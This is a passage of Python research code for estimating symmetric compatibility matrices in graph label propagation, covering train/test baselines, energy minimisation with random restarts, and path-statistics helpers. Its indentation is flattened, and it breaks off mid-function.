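#   value = energy(np.eye(k) / k)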
# default numberOfSplits = 4
# needs all the parameters required for propagation
def estimateH_baseline_parallel(X2, ind, W, numberOfSplits=4, numMax=20, ignore_rows=None, method='noecho', variant=1, distance=1, EC=False, randomize=False, weights=None,
initial_H0=None, constraints=False, alpha=0., beta=0., gamma=1., doubly_stochastic=True):
"""Estimation of H, using train-test methods and minimizing the aggregated accuracies over several splits
TODO: should be integrated with the _serial function; only minor modifications
Parameters
----------
X2 : [n x k] np array
seed belief matrix
ind: indices of seed beliefs in matrix X2
W : [n x n] sparse.csr_matrix
sparse weighted adjacency matrix
numberOfSplits: splits for train-test
    method: string
choices: ['MHE', 'LHE', 'LHEregular', 'LHE2']
MHE: Myopic Heterophily Estimation
LHE: Linear Heterophily Estimation
LHEregular: Summation formula like in standard regularization framework (very slow)
LHE2: with echo
weights: list(Default = None)
List of weights of various pathlength. w[0] is weight of neighbors (path length = 1), etc.
distance: int (Default = 1)
maximal distance (path length) that is included for estimations
    EC: Boolean (Default = False)
For method MHE: If True: Calculates the neighbors in distance d while ignoring back-tracking paths
variant: int (Default = 1)
For method MHE for H_observed: variant 1: row-normalized. (2: symmetric normalized. 3: symmetric scaled)
randomize: Boolean (Default = False)
If True, then permutes the initial h0 vector a few times for estimation, then picks the best one.
An attempt to deal with non-convexity
initial_H0: list of list of float (Default=None)
Option to specify a list of initial values for h0 from which to start the optimization when searching for best H
constraints: Boolean (Default = False)
True constrains all independent entries for H in [0, 1] (unfortunately does not constrain all entries in H)
alpha, beta: Float (Default = 0)
Optional normalization of propagation matrix
Returns
-------
H : [k x k] np array
Symmetric compatibility matrix
"""
n, k = X2.shape
if doubly_stochastic:
k_star = k * (k - 1) // 2 # integer division, returns integer
else:
k_star = k * (k - 1)
if weights is None:
weights = np.ones(distance)
indices = list(ind)
halfLen = int(len(indices) / 2)
X_train_split = {}
X_test_split = {}
train_split_idx = {}
test_split_idx = {}
print('Baseline parallel over {} splits'.format(numberOfSplits))
for iter in range(numberOfSplits):
shuffle(indices)
train_split_idx[iter] = indices[:halfLen] # indices of train set
test_split_idx[iter] = indices[halfLen:] # indices of test set
X_train_split[iter] = copy.deepcopy(X2)
for i in range(n):
if i not in train_split_idx[iter]:
X_train_split[iter][i] = np.zeros(k)
X_test_split[iter] = copy.deepcopy(X2)
for i in range(n):
if i not in test_split_idx[iter]:
X_test_split[iter][i] = np.zeros(k)
def energy_h(h):
H = transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
p = dict()
q = dict()
all_acc = np.zeros(numberOfSplits)
for iter in range(numberOfSplits):
q[iter] = Queue() # create a queue object for returning values
p[iter] = Process(target=calculate_accuracy, args=(H, X_train_split.get(iter), X_test_split.get(iter), train_split_idx.get(iter), test_split_idx.get(iter), W, q[iter]))
p[iter].start()
for iter in range(numberOfSplits):
all_acc[iter] = q[iter].get()
for iter in range(numberOfSplits):
p[iter].join()
return (-1 * np.average(all_acc))
def calculate_accuracy(H, X_train, X_test, train_ind, test_ind, W, return_output, s=0.5): # all that is needed to propagate
H0c = to_centering_beliefs(H)
eps_max = eps_convergence_linbp_parameterized(H0c, W,
method='noecho',
alpha=alpha, beta=beta, gamma=gamma,
X=X2)
eps = s * eps_max
F, actualIt, actualPercentageConverged = \
linBP_symmetric_parameterized(X_train, W, H*eps,
method='noecho',
alpha=alpha, beta=beta, gamma=gamma,
numMaxIt=numMax,
convergencePercentage=0.99,
convergenceThreshold=0.99,
debug=2)
n, k = F.shape
for i in range(n):
if i not in test_ind:
F[i] = np.zeros(k)
accuracy_X = matrix_difference(X_test, F, ignore_rows=list(train_ind), similarity='accuracy')
print("Holdout accuracy: {}".format(accuracy_X))
return_output.put(accuracy_X) ## For Parallel
# return accuracy_X ## For Non Parallel
def optimize_once(h0, energy_h):
if constraints:
bnds = [(0, 1) for _ in range(k_star)]
result = optimize.minimize(fun=energy_h, x0=h0, method='L-BFGS-B', bounds=bnds) # 'L-BFGS-B'
else:
# bnds = [(0, 1) for _ in range(k_star)]
# result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP', bounds=bnds) # 'SLSQP' 'BFGS'
# result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP') # 'SLSQP' 'BFGS'
result = optimize.minimize(fun=energy_h, x0=h0, method='Nelder-Mead') # for non continuous
h = result.get('x')
E = result.get('fun')
return h, E
h0 = np.ones(k_star).dot(1 / k) # use uninformative matrix to start with
if not randomize and initial_H0 is None:
h, _ = optimize_once(h0, energy_h)
elif initial_H0 is not None: # use supplied vector to start with
E_dic = {} # dictionary of Energy functions
for h0 in initial_H0:
h, fun = optimize_once(h0, energy_h)
E_dic[fun] = h
E_min = min(E_dic.keys()) # pick the minimum Energy
h = E_dic[E_min] # then look up the corresponding h vector
    # If randomize: then initiate the optimization with slightly permuted initial vectors (around default h0 value). Then pick the best one
else:
delta = 0.1
permutations = list(itertools.product([-delta, delta], repeat=k_star)) # permutation for default value
E_dic = {} # dictionary of Energy functions
for lst in permutations:
h1 = h0 + np.array(lst)
h, fun = optimize_once(h1, energy_h)
E_dic[fun] = h
E_min = min(E_dic.keys()) # pick the minimum Energy
h = E_dic[E_min] # then look up the corresponding h vector
# final return statement
return transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
def estimateH_baseline_serial(X2, ind, W, numberOfSplits=4, numMax=20,
EC=False,
randomize=False,
weights=None,
initial_H0=None, constraints=False,
alpha=0., beta=0., gamma=1., doubly_stochastic=True):
"""Estimation of H, using train-test methods and minimizing the aggregated accuracies over several splits.
Splits the labeled set into half test / half train. Does this numberOfSplits times.
Needs all the parameters required for propagation.
TODO: why does it need EC, weights, etc? Given it is a different function
TODO: explain here some details of the parameters. E.g. does it split into two equally sized sets (seems to be implied by code below)
Parameters
----------
X2 : [n x k] np array
seed belief matrix
ind: indices of seed beliefs in matrix X2
W : [n x n] sparse.csr_matrix
sparse weighted adjacency matrix
numberOfSplits : int (Default=4)
how many splits for train-test evaluation, taking average accuracy over all splits
numMax : int (Default=20)
TODO: why is default==20, for experiments, did you use 10?
EC : TODO delete?
randomize: Boolean (Default = False)
If True, then permutes the initial h0 vector a few times for estimation, then picks the best one.
An attempt to deal with non-convexity
TODO: why is this needed here?
weights: TODO delete?
initial_H0: list of list of float (Default=None)
Option to specify a list of initial values for h0 from which to start the optimization when searching for best H
constraints: Boolean (Default = False)
True constrains all independent entries for H in [0, 1] (unfortunately does not constrain all entries in H)
    alpha, beta, gamma: Float (Default = 0)
Optional normalization and clamping of propagation matrix
    doubly_stochastic: Boolean (Default = True)
        If True, uses k(k-1)/2 free parameters for a doubly stochastic H; otherwise k(k-1) for a row-stochastic H
Returns
-------
H : [k x k] np array
Symmetric compatibility matrix
"""
n, k = X2.shape
if doubly_stochastic:
k_star = k * (k - 1) // 2 # integer division, returns integer
else:
k_star = k * (k - 1)
indices = list(ind)
halfLen = int(len(indices) / 2) # for each numberOfSplits, splits the labeled data half into test/train sets TODO: is that correct
X_train_split = {}
X_test_split = {}
train_split_idx = {}
test_split_idx = {}
for iter in range(numberOfSplits):
shuffle(indices)
train_split_idx[iter] = indices[:halfLen] # indices of train set
test_split_idx[iter] = indices[halfLen:] # indices of test set
X_train_split[iter] = copy.deepcopy(X2)
for i in range(n):
if i not in train_split_idx[iter]:
X_train_split[iter][i] = np.zeros(k)
X_test_split[iter] = copy.deepcopy(X2)
for i in range(n):
if i not in test_split_idx[iter]:
X_test_split[iter][i] = np.zeros(k)
def energy_h(h):
"""energy function to minimize as the negative average accuracy over all splits"""
H = transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
all_acc = np.zeros(numberOfSplits)
for iter in range(numberOfSplits):
all_acc[iter] = calculate_accuracy(H, X_train_split.get(iter), X_test_split.get(iter), train_split_idx.get(iter), test_split_idx.get(iter), W, numMax)
return (-1 * np.average(all_acc))
def calculate_accuracy(H, X_train, X_test, train_ind, test_ind, W, s=0.5):
"""Propagates from X_train numMax times, calculates accuracy over X_test
"""
H0c = to_centering_beliefs(H)
eps_max = eps_convergence_linbp_parameterized(H0c, W, # TODO: an optimized version could attempt to calculate the spectral radius fewer times and re-use it for multiple splits
method='noecho',
alpha=alpha, beta=beta, gamma=gamma,
X=X2)
eps = s * eps_max
F, actualIt, actualPercentageConverged = linBP_symmetric_parameterized(X_train, W, H*eps,
method='noecho',
alpha=alpha, beta=beta, gamma=gamma,
numMaxIt=numMax,
convergencePercentage=0.99,
convergenceThreshold=0.99,
debug=2)
n, k = F.shape
for i in range(n):
if i not in test_ind:
F[i] = np.zeros(k)
# TODO For label imbalance, better to use CLASSWISE (macro-averaging) here
accuracy_X = matrix_difference(X_test, F, ignore_rows=list(train_ind), similarity='accuracy')
# print("accuracy now is {}".format(accuracy_X))
return accuracy_X
def optimize_once(h0, energy_h):
if constraints:
bnds = [(0, 1) for _ in range(k_star)]
result = optimize.minimize(fun=energy_h, x0=h0, method='L-BFGS-B', bounds=bnds) # 'L-BFGS-B'
else:
# bnds = [(0, 1) for _ in range(k_star)]
# result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP', bounds=bnds) # 'SLSQP' 'BFGS'
# result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP') # 'SLSQP' 'BFGS'
result = optimize.minimize(fun=energy_h, x0=h0, method='Nelder-Mead') # for non continuous optimization, other approaches don't work as well
h = result.get('x')
E = result.get('fun')
return h, E
h0 = np.ones(k_star).dot(1 / k) # use uninformative matrix to start with
if not randomize and initial_H0 is None:
h, _ = optimize_once(h0, energy_h)
elif initial_H0 is not None: # use supplied vector to start with
E_dic = {} # dictionary of Energy functions
for h0 in initial_H0:
h, fun = optimize_once(h0, energy_h)
E_dic[fun] = h
E_min = min(E_dic.keys()) # pick the minimum Energy
h = E_dic[E_min] # then look up the corresponding h vector
    # If randomize: then initiate the optimization with slightly permuted initial vectors (around default h0 value). Then pick the best one
else:
delta = 0.1
permutations = list(itertools.product([-delta, delta], repeat=k_star)) # permutation for default value
E_dic = {} # dictionary of Energy functions
for lst in permutations:
h1 = h0 + np.array(lst)
h, fun = optimize_once(h1, energy_h)
E_dic[fun] = h
E_min = min(E_dic.keys()) # pick the minimum Energy
h = E_dic[E_min] # then look up the corresponding h vector
# final return statement
return transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
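# Usage sketch (illustrative; 'ind' are the row indices of X2 that carry seed beliefs):
#
#     H_est = estimateH_baseline_serial(X2, ind, W, numberOfSplits=4, numMax=10)
#
# Each split hides half of the labeled rows, propagates from the other half with linBP, and
# the negative average holdout accuracy is minimized over the free parameters of H.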
def transform_hToH(h_vector, k, doubly_stochastic=True):
"""Transforms a parameter vector for a k dimensional symmetric stochastic matrix into the matrix.
Allows the optimization problem to become unconstrained.
Used by the various estimation functions.
doubly_stochastic: Boolean
- k*(k-1)/2 parameters if True (creates a doubly stochastic matrix)
- k*(k-1) parameters if False (creates a row stochastic matrix)
H(1,1) * * *
H(2,1) H(2,2) * *
    H(3,1) H(3,2) H(3,3)  *
* * * *
h(0) * * *
h(1) h(3) * *
h(2) h(4) h(5) *
* * * *
"""
if np.isnan(h_vector).any() or (np.abs(h_vector) > 10e10).any():
print("Problem in 'transform_hToH' input:", h_vector)
if k == 3 and doubly_stochastic: # slight speed-up
return np.array([[h_vector[0], h_vector[1], 1 - h_vector[0] - h_vector[1]],
[h_vector[1], h_vector[2], 1 - h_vector[1] - h_vector[2]],
[1 - h_vector[0] - h_vector[1], 1 - h_vector[1] - h_vector[2], h_vector[0] + 2 * h_vector[1] + h_vector[2] - 1]])
elif doubly_stochastic:
assert len(h_vector) == k*(k-1)//2
H = np.zeros((k, k))
for j in range(0, k-1):
s = int((k - (1+j)/2)*j) # starting index for column
for i in range(0, j):
H[i, j] = H[j, i]
for i in range(j, k-1):
H[i, j] = h_vector[s+i-j]
for j in range(0, k-1):
H[k-1, j] = 1 - H[:, j].sum()
H[j, k-1] = H[k-1,j]
H[k-1, k-1] = 1 - H[:, k-1].sum()
else:
assert len(h_vector) == k*(k-1)
H = np.zeros((k, k))
for i in range(0, k-1):
H[:,i] = h_vector[i*k:i*k+k]
H[:, k-1] = list(map(lambda r: 1-sum(r), H))
return H
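# Minimal sketch of the parameterization for k=3 (doubly stochastic case): the three free
# parameters fill the upper-left 2x2 block column by column, and the last row/column follow
# from the stochasticity constraints.
#
#     h = np.array([0.1, 0.2, 0.3])
#     H = transform_hToH(h, 3)
#     # H = [[ 0.1,  0.2,  0.7],
#     #      [ 0.2,  0.3,  0.5],
#     #      [ 0.7,  0.5, -0.2]]   # rows and columns sum to 1; entries are not forced into [0, 1]
#     # transform_HToh(H) recovers [0.1, 0.2, 0.3]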
def transform_HToh(H0, k=None, doubly_stochastic=True):
"""Extracts the k* free parameters from a k*k dimensional row stochastic matrix
"""
_, k = H0.shape
h0_vec = list()
if doubly_stochastic:
for j in range(k-1):
for i in np.arange(j, k-1):
h0_vec.append(H0[i][j])
else:
for i in range(k-1):
h0_vec.append(H0[:, i])
return h0_vec
def define_gradient_energy_H(H_vec_observed, weights=None, distance=1):
"""Returns the gradient for the energy function 'gradient_energy_H(H)' that is constructed from H_vec_observed.
Input: All observed H_vec_observed, the weight vector and maximal distance
"""
length = min(len(H_vec_observed), distance)
if weights is None:
weights = np.ones(length)
assert len(weights) >= distance
def gradient_energy_H(H):
S = 0
for i in range(length):
i2 = i+1 # 1 indexing
M = H_vec_observed[i] # 0 indexing
Si = i2 * LA.matrix_power(H, 2*i2-1) # 1 indexing
for j in range(i2):
Si -= matrix_power(H, j).dot(M).dot(matrix_power(H, i2-j-1)) # 1 indexing Also requires wrapper that makes sure that H^0 = I
S += weights[i] * Si # 0 indexing
return 2*S
return gradient_energy_H
def matrix_power(M, j):
"""H^0 of matrices with 0s on diagonal don't return the identify matrix.
But that's needed in define_gradient_energy_H. Thus this wrapper function"""
if j == 0:
return np.identity(M.shape[0])
else:
return LA.matrix_power(M, j)
def derivative_H_to_h(H, doubly_stochastic=True):
"""Calculates the partial derivative of a kxk doubly stochastic matrix with regard to the k(k-1)/2 free parameters
TODO: don't remember if the else is correct for row-stochastic values
"""
(_, k) = H.shape
h0_vec = list()
if doubly_stochastic:
for j in range(k-1):
for i in np.arange(j, k-1):
if i == j:
value = H[i][j] - H[i][-1] - H[-1][j] + H[-1][-1]
h0_vec.append(value)
else:
value = H[i][j] + H[j][i] - H[i][-1] - H[-1][j] - H[j][-1] - H[-1][i] + 2 * H[-1][-1]
h0_vec.append(value)
return np.array(h0_vec)
else:
for i in range(k):
for j in np.arange(0, k-1):
if i == j:
value = H[i][j] - H[i][-1] - H[-1][j] + H[-1][-1]
h0_vec.append(value)
else:
value = H[i][j] + H[j][i] - H[i][-1] - H[-1][j] - H[j][-1] - H[-1][i] + 2 * H[-1][-1]
h0_vec.append(value)
return np.array(h0_vec)
def calculate_H_entry(i, j, k):
"""Returns the index of the free parameter for entry (i ,j) of a symmetric doubly stochastic matrix.
Not applicable to last row and last column
"""
assert i < k-1 and j < k-1, "unique index of the free parameters only exists for entries except last row or column"
if i < j:
return calculate_H_entry(j, i, k)
else:
return int(i+j*(k-1.5-j/2))
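# Example of the index mapping for k=4 (consistent with the column-major filling used in
# 'transform_hToH'): the free parameters sit in the upper-left 3x3 block at
#
#     (0,0)->0  (1,0)->1  (2,0)->2  (1,1)->3  (2,1)->4  (2,2)->5
#
#     calculate_H_entry(2, 1, 4)   # 4
#     calculate_H_entry(1, 2, 4)   # 4, symmetric entry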
# def check_Diagonal(j, k):
# """determines whether the jth free parameter in a kxk symmetric doubly stochastic matrix is at the diagonal or not
# """
# if i < j:
# return calculate_H_entry(j, i, k)
# else:
# return int(i+j*(k-1.5-j/2))
def create_constraints(k, doubly_stochastic=True):
"""Create constraints for the k^* vector, i.e. the free parameters for a k x k dimensional stochastic matrix.
    Epsilon away from the actual border is used, because the optimization did not obey the constraints exactly
"""
epsilon = 0.00001
if doubly_stochastic:
if k == 3:
cons = (
{'type': 'ineq', 'fun': lambda x: x[0] - epsilon},
{'type': 'ineq', 'fun': lambda x: x[1] - epsilon},
{'type': 'ineq', 'fun': lambda x: x[2] - epsilon},
{'type': 'ineq', 'fun': lambda x: 1 - x[0] - x[1] - epsilon},
{'type': 'ineq', 'fun': lambda x: 1 - x[1] - x[2] - epsilon},
{'type': 'ineq', 'fun': lambda x: x[0] + 2 * x[1] + x[2] - 1 - epsilon})
else:
k_star = k*(k-1)//2
constraint = '('
for i in range(k_star): # 1. constraints for all free parameters
constraint += "{{'type': 'ineq', 'fun': lambda x: x[{0}] - {1} }},\n".format(i, epsilon)
for j in range(k-1): # 2. constraints for last row, except last cell
s = '{} '.format(1-epsilon)
for i in range(k-1):
s += ' - x[{}] '.format(calculate_H_entry(i, j, k))
constraint += "{{'type': 'ineq', 'fun': lambda x: {} }},\n".format(s)
s = '{} '.format(2-k-epsilon) # 3. constraint for last cell
for i in range(k-1):
for j in range(k - 1):
s += ' + x[{}] '.format(calculate_H_entry(i, j, k))
constraint += "{{'type': 'ineq', 'fun': lambda x: {} }})".format(s)
# print("\n\n{}".format(constraint))
cons = eval(constraint)
else:
k_star = k*(k-1)
constraint = '('
for i in range(k_star): # 1. constraints for all free parameters
constraint += "{{'type': 'ineq', 'fun': lambda x: x[{0}] - {1} }},\n".format(i, epsilon)
for i in range(k): # 2. constraints for last column
s = '{} '.format(1-epsilon)
for j in range(k-1):
s += ' - x[{}] '.format(j)
constraint += "{{'type': 'ineq', 'fun': lambda x: {} }},\n".format(s)
constraint += ")"
cons = eval(constraint)
return cons
def estimateH(X, W, method='DHE',
weights=None, distance=1, EC=True, variant=1,
randomize=False, delta=0.1,
randomrestarts=None,
initial_H0=None,
initial_h0=None,
constraints=False,
alpha=0, beta=0,
logarithm=False,
gradient=False,
verbose=False,
doubly_stochastic=True,
initial_permutationFlag=False,
initial_permutation=None,
returnExtraStats = False,
return_min_energy=False,
increamentalRandomRestartsFlag=False,
increamentalRandomRestarts = None,
):
"""Estimation of symmetric stochastic H, with various methods
Parameters
----------
X : [n x k] np array
seed belief matrix
W : [n x n] sparse.csr_matrix
sparse weighted adjacency matrix
method: string
choices
'MHE': Myopic Heterophily Estimation, new name: MCE
'DHE': Distant Heterophily Estimation, new name: DCE
'LHE': Linear Heterophily Estimation, new name: LCE
('LHEregular': Summation formula like in standard regularization framework (very slow)... not supported anymore)
('LHE2': with echo ... not supported anymore)
weights: list(Default = None)
List of weights of various pathlength. w[0] is weight of neighbors (path length = 1), etc.
Alternatively, just a single number that gets transformed into an array later
distance: int (Default = 1)
maximal distance (path length) that is included for estimations (except for MHE)
EC: Boolean (Default = True)
For method DHE: If True: Calculates the neighbors in distance d while ignoring back-tracking paths
TODO: rename to NB for non-backtracking paths
variant: int (Default = 1)
For method MHE for H_observed: variant 1: row-normalized. (2: symmetric normalized. 3: symmetric scaled)
randomize: Boolean (Default = False)
If True, then permutes the initial h0 vector a few times for estimation, then picks the best one.
        2^k_star initial vectors (each one slightly permutes the initial values around the default uninformative value)
Approach to deal with non-convexity for longer paths
delta: Float (Default = 0.1)
Optional parameter that determines the starting point for random initial points
randomrestarts: int (Default = None)
allows to use fixed number of restarts which are randomly sampled from the randomize approach
initial_H0: value of H0 to initialize with (used to be a vector, now a k times k matrix)
Option to specify a initial H0 to start the optimization
initial_h0: value of doubly stochastic parameterized h0 to initialize with (originally used to be a vector, this parameter restores this option)
Option to specify a initial H0 to start the optimization
H0 has precedence over h0
constraints: Boolean (Default = False)
True constrains all independent entries for H in [0, 1] (unfortunately does not constrain all entries in H)
        TODO: Constraints are not working correctly. It seems 'minimize' enforces constraints softly via a penalty function, and that interferes with the optimization
alpha, beta: Float (Default = 0)
Optional normalization of propagation matrix
logarithm: Boolean (Default = False)
True transforms the energy function with logarithm before optimizing
TODO: remove
gradient: Boolean (Default = False)
        True uses the gradient calculation to speed up the optimization for MHE and DHE
verbose: Boolean (Default = False)
prints extra infos: vector being optimized, resultant vector, minimum energy
doubly_stochastic: Boolean (Default = True)
False to estimate a row stochastic matrix with k(k-1) parameters instead of k(k-1)/2.
Do not modify this variable unless the graph has significant skew towards certain classes over others
initial_permutationFlag: Boolean (Default = False)
True if DCEr is supplied with a list of initial restart vectors
initial_permutation: [] (Default = None)
list of initial random restarts, each restart is a vector of k_star variables
returnExtraStats: Boolean (Default = False)
flag to return time and number of iterations taken by optimizer
return_min_energy: Boolean (Default = False)
If True, returns the optimal h vector and fun (instead of just the H matrix)
increamentalRandomRestartsFlag # TODO remove, poorly done, could be just one variable with flag and default as None
increamentalRandomRestarts = use the supplied restart points # also still adds additional permutations to it?
Returns
-------
H : [k x k] np array
Symmetric compatibility matrix
Notes
-----
Retrieves an energy function from 'define_energy_H', and then uses a common minimization routine
with a trick to optimize over k(k-1)/2 independent entries of H function
"""
_, k = X.shape
end = " " # time initializer, TODO remove
k_star = k * (k - 1)
if doubly_stochastic:
k_star = k_star // 2 # integer division, returns integer. Example: has 3 parameters for 3x3 H matrix
if weights is None:
weights = np.ones(distance)
elif isinstance(weights, Number): # allow scalar to be passed as argument
weights = np.array([np.power(weights, i) for i in range(distance)])
assert len(weights) >= distance
if initial_H0 is not None:
initial_H0 = np.atleast_2d(initial_H0) # requires 2d array
h0 = transform_HToh(initial_H0, k, doubly_stochastic=doubly_stochastic)
elif initial_h0 is None:
h0 = np.ones(k_star).dot(1 / k) # use uninformative matrix to start with
else:
h0 = initial_h0
H_vec_observed = H_observed(W, X, distance=distance, NB=EC, variant=variant) # get normalized path statistics P_hat
energy_H = define_energy_H(W=W, X=X, method=method, weights=weights, alpha=alpha, # TODO: remove W X as input later once alpha and beta not used anymore
beta=beta, distance=distance, EC=EC, variant=variant,
H_vec_observed=H_vec_observed)
def energy_h(h):
"""changes parameters for energy function from matrix H to free parameters in array"""
H = transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
if not logarithm: # TODO: remove logarithm if not used anymore
return energy_H(H)
else:
return np.log(energy_H(H))
if gradient:
if method not in ['DHE', 'MHE']:
warnings.warn("\nGradient only defined for DCE")
gradient_energy_H = define_gradient_energy_H(H_vec_observed=H_vec_observed, weights=weights, distance=distance)
def gradient_energy_h(h):
"""changes parameters for gradient from matrix H to free parameters in array"""
H = transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
g = gradient_energy_H(H)
if np.isnan(g).any(): # TODO obsolete, delete
print("Gradient with nan:")
print(g)
print("Original H:")
print(H)
print("Original h:")
print(h)
print("H_vec observed:")
print(H_vec_observed)
h = derivative_H_to_h(g, doubly_stochastic=doubly_stochastic)
return h
PRINTINTERMEDIATE = False # option to print intermediate results from optimizer (for debugging)
global Nfeval, permutations
Nfeval = 1
def callbackfct(x): # print intermediate results, commented out in non-gradient loops below
global Nfeval
if PRINTINTERMEDIATE:
np.set_printoptions(precision=4)
print('{0:4d} {2} {1} '.format(Nfeval, energy_h(x), x))
print('Iter: {}'.format(Nfeval))
Nfeval += 1
bnds = [(0,1) for i in range(k_star)] # optional bounds for variables to be used in optimization function
if constraints:
cons = create_constraints(k)
def optimize_once(h0, energy_h):
"""actual optimization step that can be repeated multiple times from random starting point"""
if gradient:
# using gradients:
# BFGS: slightly slower than SLSQP, but converges better (can escape from weak saddle points), even finds optimum from some wrong points
# SLSQP: slightly faster than BFGS, but gets more likely stuck in saddle points
            # L-BFGS-B: seemingly no advantage. Cannot deal with constraints although specified
# CG: considerably slower :(
# Newton-CG: considerably slower :(
if constraints: # TODO not yet tested
result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP',
constraints=cons,
jac=gradient_energy_h,
# bounds=bnds,
callback=callbackfct,
) # 'SLSQP' 'BFGS'
else:
result = optimize.minimize(fun=energy_h, x0=h0, method='BFGS',
jac = gradient_energy_h,
# bounds=bnds, # bounds make it perform worse. Problem of optimization implementation
callback = callbackfct,
) # 'SLSQP' 'BFGS'
# print('Iter: {}'.format(Nfeval))
h = result.get('x')
E = result.get('fun')
return h, E
else:
if constraints:
# TODO: constraints are not working correctly. Problem seems to be with actual method 'SLSQP': (1) ignoring the constraints
# TODO: and (2) even missing local optima it finds without those constraints ...
result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP',
constraints=cons,
# bounds=bnds,
callback=callbackfct,
) # 'SLSQP' 'BFGS'
else:
result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP',
# bounds=bnds, # bounds make it perform worse. Problem of optimization implementation
callback = callbackfct,
) # 'SLSQP' 'BFGS'
h = result.get('x')
E = result.get('fun')
return h, E
if not randomize: # use supplied vector uninformative vector to start with
start = time()
h, fun = optimize_once(h0, energy_h)
end = time() - start
if verbose:
print("Initial:{} Result:{} Energy:{}".format(np.round(h0, decimals=3), np.round(h, decimals=3), fun))
# print("DCE fun: {}".format(fun))
print("Time taken by energy optimize: {}".format(str(end)))
else:
if initial_permutationFlag: # TODO: allows explicit starting point. Cleaner to use without the flag
permutations = initial_permutation
else:
# If randomize: then initiate the optimization with slightly permuted initial vectors (around default h0 value).
# Then pick the best one result after optimization
# Original variant used in total 2^k_star initial vectors, each one for each of the "quadrants" around the default values:
# permutations = list(itertools.product([-delta, delta], repeat=k_star)) # permutation for default value
# TODO: This code part below is not done well. Also runs into coupon collector's problem.
            # Problem it tries to solve: we can't hard-code 10 random restarts if none are specified
            # Does not allow specifying the GT matrix as an initial starting point, e.g. to check whether the variant can recover it as a local optimum
# TODO: old likely obsolete comment: "What happens when pruneRandom and Gradient is True for LCE and MCE"
            if randomrestarts is None:
randomrestarts = k_star
if increamentalRandomRestartsFlag: # TODO: remove, as the code below adds to an initial permutation?
permutations = increamentalRandomRestarts
else:
permutations = []
while len(permutations) < randomrestarts:
perm = []
for _ in range(k_star):
perm.append(random.choice([-delta, delta]))
if perm not in permutations: # TODO: Coupon collector's problem, what happens if 10 specified, but only 8 quadrants?
permutations.append(perm)
# print("permutations length: {}, check: {}, {}".format(len(permutations), k*(k-1)/2, 2**(k*(k-1)/2)))
# print("JUST AFTER Perms ", permutations)
E_dic = {} # dictionary of Energy functions
for lst in permutations:
Nfeval = 1
h1 = h0 + np.array(lst)
h, fun = optimize_once(h1, energy_h)
E_dic[fun] = h # resolve ties randomly
if verbose:
print("Initial:{} Result:{} Energy:{}".format(h1, np.round(h,decimals=3), fun))
# print(" h0: {}".format(h1))
# print(" h: {}".format(h))
print(" fun: {}".format(fun))
fun = min(E_dic.keys()) # pick the minimum Energy
h = E_dic[fun] # then look up the corresponding h vector
# print("DCEr fun: {}".format(fun))
if returnExtraStats:
return transform_hToH(h, k, doubly_stochastic=doubly_stochastic), end, Nfeval #TODO:remove End, Nfeval
elif increamentalRandomRestarts:
return [transform_hToH(h, k, doubly_stochastic=doubly_stochastic), permutations] # TODO:remove End, Nfeval, permutations
elif return_min_energy:
return h, fun
else:
return transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
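# Usage sketch (assumptions as in the docstring: W is a symmetric sparse.csr_matrix adjacency
# matrix, X an [n x k] seed-belief matrix with zero rows for unlabeled nodes):
#
#     H_est = estimateH(X, W, method='DHE', distance=5, weights=0.5, randomize=True)
#
# The scalar weights=0.5 is expanded to [1, 0.5, 0.25, ...]; randomize=True gives the DCEr
# variant with k_star random restarts around the uninformative starting point.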
def H_observed(W, X, distance, NB=True, variant=1):
"""Calculates a list [H1, H2, ..., Hd] with Hd being the row-normalized Markov matrix that is used for DHE
Parameters distance and NB are passed through to 'M_estimation'
Notice index starts at 1, in contrast to M_observed
variant == 1: row-stochastic
variant == 2: symmetric, normalized like LGC
variant == 3: divides by sum of matrix
SIGMOD 2020 refers to a 'two-step process' for estimating compatibilities.
This method can be thought of as step 1, or calculating the graph statistics P-hat
"""
n, n2 = W.shape
n3, k = X.shape
assert (n == n2) & (n == n3)
assert distance in range(1, 10)
assert variant in [1, 2, 3]
M_vec = M_observed(W, X, distance, NB=NB)
H_vec = []
for M in M_vec[1:]:
Mrowtot = M.dot(np.ones([k])) # row total for M. problem of "sum": returns integer data type (does not work with np.power)
Mrowtot[Mrowtot == 0] = 1 # don't normalize rows that have no entries
if variant == 1:
D_inv = np.diag(np.power(Mrowtot, -1)) # 'sparse.diags' does not work
H_vec.append(D_inv.dot(M))
elif variant == 2:
D_inv_red = np.diag(np.power(Mrowtot, -0.5))
H_vec.append((D_inv_red.dot(M)).dot(D_inv_red))
else: # variant == 3
if np.sum(M) == 0: # TODO
print("\ndivision by zero because M is \n{}\nfor\n{}".format(M, M_vec))
                H_vec.append(M + 1/k)  # fall back to an uninformative uniform matrix
                print("fallback H is \n{}\nfor {}".format(M + 1/k, H_vec))
else:
normalizer = 1 / (np.sum(M) / k)
H_vec.append(M.dot(normalizer))
return H_vec
def M_observed(W, X, distance, NB=True):
"""Calculates a list [M0, M1, M2, ..., Md] with Md = X^T W^d X where d=distance
Optional with or without NB
Assumes W is symmetric
Intermediate result Nd = W^d X for memoization (then Md = X^T Nd)
Tip: Important trick for speed: never multiply W with W directly
Notice index starts at 0, in contrast to H_observed"""
n, n2 = W.shape
n3, k = X.shape
assert (n == n2) & (n == n3)
    assert isinstance(distance, int) and (distance >= 0)
N_vec = []
M_vec = []
N_vec.append(X)
M_vec.append(X.transpose().dot(N_vec[-1]))
if distance >= 1:
N_vec.append(W.dot(X))
M_vec.append(X.transpose().dot(N_vec[-1]))
if distance >= 2:
if not NB:
N_vec.append(W.dot(N_vec[-1]))
else:
D = sparse.diags(W.dot(np.ones(n, dtype=int)), 0, dtype=int)
D_I = D - sparse.diags(np.ones(n, dtype=int), 0, dtype=int)
N_vec.append(W.dot(N_vec[-1]) - D.dot(X))
M_vec.append(X.transpose().dot(N_vec[-1]))
for _ in range(3, distance+1):
if not NB:
N_vec.append(W.dot(N_vec[-1]))
else:
